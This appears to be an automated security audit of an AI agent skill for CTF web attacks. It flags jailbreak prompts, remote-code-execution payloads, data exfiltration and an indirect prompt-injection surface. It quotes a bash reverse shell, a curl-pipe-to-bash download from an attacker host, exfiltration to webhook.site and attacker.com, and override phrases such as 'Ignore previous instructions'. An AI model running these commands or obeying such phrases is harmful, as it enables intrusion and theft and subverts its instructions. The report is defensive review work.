ctf-web-methodology
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: CRITICALPROMPT_INJECTIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [PROMPT_INJECTION]: The skill contains extensive documentation and examples of AI jailbreak techniques, including prompts to override system instructions, disable personas, and extract system prompts (found in
references/auth-and-access.mdandreferences/field-notes.md). These patterns, such as 'Ignore previous instructions' and 'System Override', pose a risk to the agent's own stability and safety filters if not handled in a strictly sandboxed context. - [REMOTE_CODE_EXECUTION]: Multiple files contain functional code and payloads for achieving remote code execution. Notably,
references/server-side-advanced-2.mdcontains a complete Python script for a 'Rogue MySQL Server' designed to steal files via theLOAD DATA LOCALprotocol, which was flagged as a Trojan by antivirus scanners. Other files provide payloads for Java and Python deserialization vulnerabilities. - [COMMAND_EXECUTION]: The skill provides numerous payloads for shell command execution across different platforms and languages.
references/server-side-deser.mdandreferences/field-notes.mdinclude active reverse shell patterns (e.g.,bash -i >& /dev/tcp/ATTACKER/4444 0>&1) designed to grant remote access to an attacker. - [DATA_EXFILTRATION]: The methodology describes several techniques for exfiltrating sensitive data to external domains such as
webhook.siteandattacker.comvia HTTP requests, DNS queries, and custom response headers (found inreferences/server-side-exec.md,references/auth-and-access.md, andreferences/flag-extraction.md). - [EXTERNAL_DOWNLOADS]: The skill includes instructions for downloading and executing remote scripts (e.g.,
curl http://attacker/shell.sh | bashinreferences/server-side-exec.md), which is a high-risk pattern for arbitrary code execution. - [INDIRECT_PROMPT_INJECTION]: The skill creates a high-risk surface for indirect prompt injection.
- Ingestion points: The agent is instructed to use tools like
http_requestto fetch and analyze HTML, source code, and API responses from target websites (SKILL.md). - Capability inventory: The skill provides the agent with a vast array of powerful attack capabilities (RCE, file reading, network exfiltration).
- Boundary markers: There are no instructions or delimiters provided to separate target-provided content from the agent's internal instructions.
- Sanitization: There is no mention of sanitizing or validating external content before the agent uses it to make decisions or formulate new commands.
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- AI detected serious security threats
Audit Metadata